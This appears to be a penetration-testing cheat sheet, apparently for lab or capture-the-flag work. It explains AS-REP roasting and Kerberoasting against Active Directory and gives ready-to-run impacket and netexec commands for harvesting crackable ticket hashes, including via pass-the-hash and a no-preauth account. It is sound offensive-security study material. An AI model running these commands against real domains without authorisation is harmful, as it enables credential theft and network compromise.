🎭Attacking Kerberos

This guide covers common attack techniques against Kerberos authentication in Active Directory environments.

AS-REP Roast Attack

If you have a list of valid users, you can perform an AS-REP Roast Attack to obtain a Ticket Granting Ticket (TGT) and then crack its hash to get the password.

This attack queries the Domain Controller (DC) to check if any of the users in your list have the Kerberos flag DONT_REQ_PREAUTH enabled.

The attack can be attempted multiple times as you discover more valid users. From BloodHound, you can identify users with this condition.

Commands

# AS-REP Roast using impacket-GetNPUsers
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null

# AS-REP Roast through impacket-GetNPUsers with a while loop
while read username; do impacket-GetNPUsers domain.htb/"$username" -request -no-pass -dc-ip 10.10.10.10 >> hashes.txt; done < users.txt 2>/dev/null

# AS-REP Roast through netexec
netexec ldap 10.10.10.10 -u users.txt -p '' --asreproast hashes.txt

Kerberoasting Attack

If you have valid credentials for a domain user, you can perform a Kerberoasting Attack to obtain a Ticket Granting Service (TGS) from a user that has a servicePrincipalName (SPN) assigned.

The obtained hash can be cracked to retrieve the credentials in plaintext.

Commands

# Kerberoasting Attack through impacket-GetUserSPNs with basic authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request 2>/dev/null

# Kerberoasting Attack through Kerberos authentication (requires TGT ticket in KRB5CCNAME)
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null

# Kerberoasting Attack using Pass-the-Hash
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -hashes :<NTLM_HASH> -request 2>/dev/null

# Kerberoasting Attack through netexec
netexec ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting output.txt

Exception: Kerberoasting Without Credentials

There is an exception to perform the Kerberoasting Attack without having valid credentials.

If you know there is a user that is vulnerable to AS-REP Roast (i.e., the user has the DONT_REQ_PREAUTH flag enabled), you can also perform this attack without valid credentials.

In this case, the user called usuarioASREP is susceptible to an AS-REP Roast, meaning it has the Kerberos DONT_REQ_PREAUTH flag enabled.

Therefore, you can perform a Kerberoasting Attack without having valid domain credentials, but having a user that is susceptible to AS-REP Roast.

impacket-GetUserSPNs -no-preauth 'usuarioASREP' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.10 2>/dev/null

Key Points

  • AS-REP Roast targets users with DONT_REQ_PREAUTH flag enabled

  • Kerberoasting targets users with Service Principal Names (SPNs)

  • Both attacks can yield hashes that may be crackable offline

  • BloodHound can help identify vulnerable users

  • Multiple authentication methods are available (credentials, hashes, tickets)

Tools Used

  • impacket-GetNPUsers - For AS-REP Roast attacks

  • impacket-GetUserSPNs - For Kerberoasting attacks

  • netexec - Alternative tool for both attack types

  • BloodHound - For reconnaissance and identifying vulnerable accounts

Last updated